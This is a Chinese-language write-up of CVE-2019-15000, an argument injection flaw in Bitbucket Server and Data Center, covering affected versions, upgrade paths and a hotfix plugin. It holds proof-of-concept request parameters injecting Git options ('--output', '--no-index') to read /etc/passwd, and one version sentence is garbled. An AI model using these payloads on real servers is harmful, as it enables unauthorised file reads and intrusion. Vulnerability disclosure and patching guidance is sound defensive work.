Bitbucket - Argument Injection - CVE-2019-15000
摘要 | CVE-2019-15000-参数注入 |
|---|---|
发布日期 | 2019-09-18 |
产品展示 | Bitbucket服务器 Bitbucket数据中心 |
受影响的Bitbucket服务器和Bitbucket数据中心版本 |
|
固定的Bitbucket服务器和Bitbucket数据中心版本 |
|
CVE ID | CVE-2019-15000 |
从5.16.10之前的所有版本的Bitbucket Server&Bitbucket数据中心(5.16.x的固定版本),从6.0.10之前的6.0.0(6.0.x的固定版本),从6.1.0之前的6.1.0( 6.1.x的固定版本),6.2.6之前的6.2.0(6.2.x的固定版本),6.3.5之前的6.3.0(6.3.x的固定版本),6.4.0之前的版本6.4.3(6.4.x的固定版本)以及6.5.2之前的6.5.0(6.5.x的固定版本)受此漏洞影响。
表现
Bitbucket服务器和Bitbucket数据中心存在参数注入漏洞,使得攻击者能够将其他参数注入Git命令,从而导致远程代码执行。如果远程攻击者能够访问Bitbucket服务器或Bitbucket数据中心中的Git存储库,则可以利用此参数注入漏洞进行攻击。如果为项目或存储库启用了公共访问,则攻击者可以匿名利用此问题。
** 参考链接:https://cloud.tencent.com/developer/article/1541527
[效果及截图]
查看链接url
利用burp抓包,查看此页面设计的数据包,发现如下包
修改包如下
POC:at=master&since=--output=--&avatarSize=64&markup=false&contextLines=10000&withComments=true&autoSrcPath=false
然后点击发送
再次修改这个包如下:
POC:--/diff//etc/passwd?at=master&since=--no-index&avatarSize=64&markup=false&contextLines=10000&withComments=true&autoSrcPath=false
查看回复情况
解决方案
通过插件方式处理
为了帮助缓解该问题,我们以插件的形式提供了一个修补程序,该修补程序可以在零停机时间内启用。如果您已经在Bitbucket的固定版本上,则不需要此修补程序,并且该修补程序将拒绝在任何固定版本上安装。
下载插件:https://jira.atlassian.com/secure/attachment/376655/bitbucket-bserv-11896-hotfix-1.0.0.jar 通过插件管理安装此插件,
此方法适应于:
标准Bitbucket功能和特性
Bitbucket服务器和数据中心版本4.0.0及更高版本
Bitbucket服务器和数据中心实例
升级版本
升级到最新版本:
当前使用版本 | 升级到版本 |
|---|---|
1.x 2.x 3.x 4.x 5.x | 5.16.10 6.0.10 6.1.8 6.2.6 6.3.5 6.4.3 6.5.2 |
6.0.x | 6.0.10 6.1.8 6.2.6 6.3.5 6.4.3 6.5.2 |
6.1.x | 6.1.8 6.2.6 6.3.5 6.4.3 6.5.2 |
6.2.x | 6.2.6 6.3.5 6.4.3 6.5.2 |
6.3.x | 6.3.5 6.4.3 6.5.2 |
6.4.x | 6.4.3 6.5.2 |
6.5.x | 6.5.2 |